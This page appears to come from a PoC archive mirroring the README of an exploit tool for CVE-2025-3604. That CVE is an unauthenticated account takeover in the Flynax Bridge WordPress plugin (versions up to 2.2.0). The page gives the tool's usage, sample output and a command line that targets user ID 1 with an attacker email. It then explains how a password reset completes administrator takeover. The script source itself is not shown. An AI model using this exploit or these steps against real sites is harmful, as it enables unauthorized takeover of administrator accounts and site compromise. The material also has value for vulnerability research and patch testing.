Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-3604 PoC — Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover

Source
https://github.com/Nxploited/CVE-2025-3604
Associated Vulnerability
Title:Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover (CVE-2025-3604)
Description:The Flynax Bridge plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.2.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.
Description
Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover
Readme

# 🚨 Flynax Bridge <= 2.2.0 - Unauthenticated Privilege Escalation via Account Takeover

## 📄 Description

The **Flynax Bridge** plugin for WordPress is vulnerable to **privilege escalation via account takeover** in all versions up to, and including, `2.2.0`.

This is due to the plugin not properly validating a user's identity prior to updating their account details (such as email). As a result, **unauthenticated attackers** can change the email address of **any user**, including **administrators**, and then initiate a **password reset** to fully take over the account.

> **CVE**: CVE-2025-3604  
> **CVSS**: 9.8 (Critical)  
> **Published**: April 23, 2025  
> **Last Updated**: April 24, 2025

---

## ⚙️ Script Output Example

```
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: user@admin.sa
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
```

After successful exploitation, the attacker can go to the WordPress login page and click on **"Lost your password?"** using the **newly set email** to reset the password and gain full access to the targeted account.

---

## 🚀 Usage

```
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit
```

---

## 🧪 Example

```
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "attack@attacker.com"
```

### Explanation:

- `-u`: Base URL of the WordPress site.
- `-id`: ID of the user to target (typically 1 for admin).
- `-mail`: New email that will be set for that user.

---
## ⚠️ Disclaimer
 Use at your own risk. For authorized testing and educational purposes only.




### 🧑‍💻
*BY: Nxploited ( Khaled_alenazi )*
File Snapshot

 [4.0K]  /data/pocs/a5a79738b8543eccf9980496da821558c81f9f8c
├── [3.4K]  CVE-2025-3604.py
├── [1.1K]  LICENSE
└── [2.0K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →